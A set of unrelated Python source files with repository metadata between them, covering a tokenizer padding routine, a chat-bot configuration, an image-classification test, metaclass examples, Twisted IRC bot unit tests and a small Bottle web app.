stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Return tensor is None, then we can remove the leading batch axis
# Overflowing tokens are returned as a batch of output so we keep them in this case
if return_tensors is None and not return_overflowing_tokens:
batched_output = BatchEncoding(
{
key: value[0] if len(value) > 0 and isinstance(value[0], list) else value
for key, value in batched_output.items()
},
batched_output.encodings,
)
self._eventual_warn_about_too_long_sequence(batched_output["input_ids"], max_length, verbose)
return batched_output
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs: Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
>= 7.5 (Volta).
return_attention_mask: (optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["bbox"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERT sequence has the following format:
- single sequence: ``[CLS] X [SEP]``
- pair of sequences: ``[CLS] A [SEP] B [SEP]``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
if token_ids_1:
output += token_ids_1 + [self.sep_token_id]
return output
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A BERT sequence
pair mask has the following format: :: 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 | first sequence | second
sequence | If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
files = self._tokenizer.model.save(save_directory, name=filename_prefix)
return tuple(files)
| 13,647 | 0 | 165 |
0cc2be9029f380cb58334409d1c247b9e8a6d659 | 1,071 | py | Python | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | config_example.py | KellyHwong/bronya-bot | 7c7322aa8cd739dcd9af37c195c353221b3ab7f1 | [
"MIT"
] | null | null | null | import os
from nonebot.default_config import *
# bot profile
BOT_NAME = "布洛妮娅"
COMMAND_START = {'', '/', '!', '/', '!'}
# paths
PROJECT_BRONYA = os.path.dirname(os.path.abspath(__file__)) # 本文件所在目录
ASSETS = os.path.join(PROJECT_BRONYA, "assets")
DATA = os.path.join(PROJECT_BRONYA, "data")
# super users
SUPERUSERS = [] # e.g., 1234567890
# define group ids
MY_GROUP_IDs = [] # e.g., 123456789
BED_TIME = [0, 8] # 睡觉起始时间,0点到8点
GROUP_TIME_ZONE = {123456789: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo"},
987654321: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo",
"纽约": "America/New_York"}}
# 报时时间设置
GROUP_DAYTIME = {
123456789: {"daytime": (0, 23)}, # all day long
987654321: {"daytime": (9, 23)} # day time
}
# whether -1s every minute
GROUP_MAHA = {123456789: False,
987654321: True}
if __name__ == "__main__":
main()
| 24.340909 | 71 | 0.547152 | import os
from nonebot.default_config import *
# bot profile
BOT_NAME = "布洛妮娅"
COMMAND_START = {'', '/', '!', '/', '!'}
# paths
PROJECT_BRONYA = os.path.dirname(os.path.abspath(__file__)) # 本文件所在目录
ASSETS = os.path.join(PROJECT_BRONYA, "assets")
DATA = os.path.join(PROJECT_BRONYA, "data")
# super users
SUPERUSERS = [] # e.g., 1234567890
# define group ids
MY_GROUP_IDs = [] # e.g., 123456789
BED_TIME = [0, 8] # 睡觉起始时间,0点到8点
GROUP_TIME_ZONE = {123456789: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo"},
987654321: {"北京": "Asia/Shanghai",
"东京": "Asia/Tokyo",
"纽约": "America/New_York"}}
# 报时时间设置
GROUP_DAYTIME = {
123456789: {"daytime": (0, 23)}, # all day long
987654321: {"daytime": (9, 23)} # day time
}
# whether -1s every minute
GROUP_MAHA = {123456789: False,
987654321: True}
def main():
print(f"PROJECT_BRONYA:{PROJECT_BRONYA}")
if __name__ == "__main__":
main()
| 37 | 0 | 25 |
380f61b2464263e3c92644dd1d6befdfa1b377b4 | 78 | py | Python | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | graphpype/interfaces/plot_igraph/__init__.py | EtienneCmb/graphpype | f19fdcd8e98660625a53c733ff8e44d60c31bd68 | [
"BSD-3-Clause"
] | null | null | null | from .plots import (PlotIGraphModules,PlotIGraphCoclass,PlotIGraphConjCoclass) | 78 | 78 | 0.897436 | from .plots import (PlotIGraphModules,PlotIGraphCoclass,PlotIGraphConjCoclass) | 0 | 0 | 0 |
b383b24d7695ee83f7198c6a02d42d48db7c4110 | 378 | py | Python | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | 11 | 2020-09-22T05:55:49.000Z | 2021-06-17T23:35:17.000Z | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | null | null | null | test_classification.py | yas-sim/openvino_open_model_zoo_toolkit | 23b65130e7ecff96c19d9b7d74ac8407096b64fe | [
"Apache-2.0"
] | 1 | 2020-09-22T13:19:53.000Z | 2020-09-22T13:19:53.000Z | import cv2
import open_model_zoo_toolkit as omztk
omz = omztk.openvino_omz()
model = omz.imageClassifier()
img = cv2.imread('resources/car.png')
res = model.run(img)
print(res)
# Example: res = [[479, 'car wheel', 0.5016654], [817, 'sports car, sport car', 0.31316656], [436, 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon', 0.06171181]]
| 34.363636 | 198 | 0.719577 | import cv2
import open_model_zoo_toolkit as omztk
omz = omztk.openvino_omz()
model = omz.imageClassifier()
img = cv2.imread('resources/car.png')
res = model.run(img)
print(res)
# Example: res = [[479, 'car wheel', 0.5016654], [817, 'sports car, sport car', 0.31316656], [436, 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon', 0.06171181]]
| 0 | 0 | 0 |
b94711acefa35c5a95689bfe650fc1cfad0db15c | 618 | py | Python | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 30 | 2020-01-22T17:22:43.000Z | 2022-01-26T08:28:57.000Z | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 1 | 2020-01-21T19:50:47.000Z | 2020-03-18T16:18:31.000Z | week11/examples/metaclass.py | HackBulgaria/Programming-101-Python-2020-Spring | 443446028df7fe78fcdd6c37dada0b5cd8ed3c93 | [
"MIT"
] | 7 | 2019-11-28T15:59:16.000Z | 2020-12-05T08:39:02.000Z | from class_decorators import debugmethods
b = B()
b.m()
| 15.073171 | 59 | 0.587379 | from class_decorators import debugmethods
class mytype(type):
def __new__(cls, name, bases, clsdict):
def m(self):
print(self)
print('in m')
clsdict['m'] = m
clsobj = super().__new__(cls, name, bases, clsdict)
return clsobj
class mytype2(type):
def __new__(cls, name, bases, clsdict):
print('mytype2')
clsobj = super().__new__(cls, name, bases, clsdict)
return clsobj
class Base(metaclass=mytype):
pass
class Base2(metaclass=mytype2):
pass
class A(Base2, Base):
pass
class B(A):
pass
b = B()
b.m()
| 324 | 41 | 190 |
ca4d798bbea04611785a378457e19cba2d83a20b | 2,378 | py | Python | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | network/MySourceFiles/tests/test_talkbackbot.py | dstack4273/new-coder_tutorials | 658344fdeca6ab3957dfe6646e5ac9b75ce07c94 | [
"Zlib"
] | null | null | null | from twisted.test import proto_helpers
from twisted.trial import unittest
from talkback.bot import TalkBackBotFactory
QUOTE = "Nobody minds having what is too good for them. ~ Jane Austen"
class FakePicker(object):
"""
Always return the same quote.
"""
| 34.463768 | 81 | 0.62069 | from twisted.test import proto_helpers
from twisted.trial import unittest
from talkback.bot import TalkBackBotFactory
QUOTE = "Nobody minds having what is too good for them. ~ Jane Austen"
class FakePicker(object):
"""
Always return the same quote.
"""
def __init__(self, quote):
self._quote = quote
def pick(self):
return self._quote
class TestTalkBackBot(unittest.SynchronousTestCase):
_channel = "#testchannel"
_username = "tester"
_us = 'tbb'
def setUp(self):
factory = TalkBackBotFactory(
self._channel,
self._us,
'Jane Doe',
FakePicker(QUOTE),
['twss'],
)
self.bot = factory.buildProtocol(('127.0.0.1', 0))
self.fake_transport = proto_helpers.StringTransport()
self.bot.makeConnection(self.fake_transport)
self.bot.signedOn()
self.bot.joined(self._channel)
self.fake_transport.clear()
def test_privmsgNoTrigger(self):
"""Shouldn't send a quote if message does not match any triggers"""
self.bot.privmsg(self._username, self._channel, "hi")
self.assertEqual('', self.fake_transport.value())
def test_privmsgWithTrigger(self):
"""Should send a quote if message matches a trigger"""
self.bot.privmsg(self._username, self._channel, "twss")
self.assertEqual(
'PRIVMSG {channel} :{username}: {quote}\r\n'.format(
channel=self._channel, username=self._username, quote=QUOTE
),
self.fake_transport.value())
def test_privmsgAttribution(self):
"""If someone attributes the bot in public, they get a public response"""
self.bot.privmsg(self._username, self._channel, self._us + ': foo')
self.assertEqual(
'PRIVMSG {channel} :{username}: {quote}\r\n'.format(
channel=self._channel, username=self._username, quote=QUOTE
),
self.fake_transport.value())
def test_privmsgPrivateMessage(self):
"""For private messages, should send quote directly to user"""
self.bot.privmsg(self._username, self._us, "hi")
self.assertEqual(
'PRIVMSG {username} :{quote}\r\n'.format(
username=self._username, quote=QUOTE
),
self.fake_transport.value())
| 500 | 1,534 | 76 |
b349c7b11298b71add2f551a38fd6c57bb8cfcdf | 642 | py | Python | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | exercise-2-templates/server.py | agdonovan98/web-programming | 210cc49943630364a2a5b1363c658a264966f807 | [
"Unlicense"
] | null | null | null | from bottle import route, run, template, debug
# http://localhost:8068/
@route("/")
@route("/hello")
@route("/hello/<name>")
debug(True)
run(host="localhost", port=8068) | 19.454545 | 46 | 0.412773 | from bottle import route, run, template, debug
# http://localhost:8068/
@route("/")
def get_index():
return "Hello!"
@route("/hello")
@route("/hello/<name>")
def get_hello(name="Santa"):
data = {
"holiday":False,
'people':[
{
"name":"Santa",
"title":"Mr"
},
{
"name":"Wendy",
"title":"Ms."
},
{
"name":"Greg",
"title":"Dr."
}
],
}
name = "Santa"
return template("hello", data=data)
debug(True)
run(host="localhost", port=8068) | 425 | 0 | 44 |